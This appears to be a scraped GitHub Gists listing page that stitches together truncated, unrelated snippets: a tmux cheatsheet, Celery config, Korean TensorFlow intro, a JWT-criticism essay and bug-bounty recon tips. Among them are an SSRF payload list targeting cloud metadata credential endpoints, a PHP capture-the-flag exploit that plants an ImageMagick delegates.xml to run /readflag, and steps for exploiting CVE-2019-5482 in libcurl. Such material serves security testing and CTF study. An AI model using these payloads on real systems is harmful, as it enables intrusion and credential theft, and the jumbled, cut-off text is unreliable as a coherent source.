start new:
tmux
start new with session name:
tmux new -s myname
stypr
🆎**********************************
MohamedAlaa
/ tmux-cheatsheet.markdown
Last active
November 17, 2024 01:28
tmux shortcuts & cheatsheet
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Useful celery config. | |
| app = Celery('tasks', | |
| broker='redis://localhost:6379', | |
| backend='redis://localhost:6379') | |
| app.conf.update( | |
| CELERY_TASK_RESULT_EXPIRES=3600, | |
| CELERY_QUEUES=( | |
| Queue('default', routing_key='tasks.#'), |
글쓴이: 김정주([email protected])
이 문서는 텐서플로우 공식 페이지 내용을 바탕으로 만들어졌습니다.
텐서플로우(TensorFlow)는 기계 학습과 딥러닝을 위해 구글에서 만든 오픈소스 라이브러리입니다. 데이터 플로우 그래프(Data Flow Graph) 방식을 사용하였습니다.
BuffaloWill
/ cloud_metadata.txt
Last active
September 30, 2024 02:53
Cloud Metadata Dictionary useful for SSRF Testing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Copyright (c) 1996, 1998, Oracle and/or its affiliates. All rights reserved. | |
| * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. | |
| * | |
| * This code is free software; you can redistribute it and/or modify it | |
| * under the terms of the GNU General Public License version 2 only, as | |
| * published by the Free Software Foundation. Oracle designates this | |
| * particular file as subject to the "Classpath" exception as provided | |
| * by Oracle in the LICENSE file that accompanied this code. | |
| * |
EdOverflow
/ github_bugbountyhunting.md
Last active
November 8, 2024 20:13
My tips for finding security issues in GitHub projects.
GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.
You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.
$ python githubcloner.py --org organization -o /tmp/output
TLDR: JWTs should not be used for keeping your user logged in. They are not designed for this purpose, they are not secure, and there is a much better tool which is designed for it: regular cookie sessions.
If you've got a bit of time to watch a presentation on it, I highly recommend this talk: https://www.youtube.com/watch?v=pYeekwv3vC4 (Note that other topics are largely skimmed over, such as CSRF protection. You should learn about other topics from other sources. Also note that "valid" usecases for JWTs at the end of the video can also be easily handled by other, better, and more secure tools. Specifically, PASETO.)
A related topic: Don't use localStorage (or sessionStorage) for authentication credentials, including JWT tokens: https://www.rdegges.com/2018/please-stop-using-local-storage/
The reason to avoid JWTs comes down to a couple different points:
- The JWT specification is specifically designed only for very short-live tokens (~5 minute or less). Sessions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $home = '/tmp/84d99af2ce44bb1dd3398190b930c8ac'; | |
| ini_set('display_errors', 1); | |
| mkdir("$home/.magick/"); | |
| file_put_contents("$home/.magick/delegates.xml", "<delegatemap><delegate decode=\"foo\" command=\"/readflag > $home/flag\"/></delegatemap>"); | |
| mkdir("$home/.config/"); | |
| mkdir("$home/.config/ImageMagick"); | |
| file_put_contents("$home/.config/ImageMagick/delegates.xml", "<delegatemap><delegate decode=\"foo\" command=\"/readflag > $home/flag\"/></delegatemap>"); | |
| touch("$home/test.foo"); | |
| $_ENV['HOME'] = $home; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 123; | |
| return 123; | |
| } | |
| extern void *opendir(const char *); | |
| extern void *readdir(void *); | |
| extern void *shmat(int, const void *, int); | |
| typedef struct { | |
| ino_t d_ino; | |
| off_t d_off; | |
| unsigned short d_reclen; |
- Confirm that you have unpatched version of libcurl, which contains CVE-2019-5482
- Update ip addresses at the source files
- Launch
srv.pyon the server - Upload
sol.phpvia curl:curl http://$URL:$PORT/ -d '[email protected]'
OlderNewer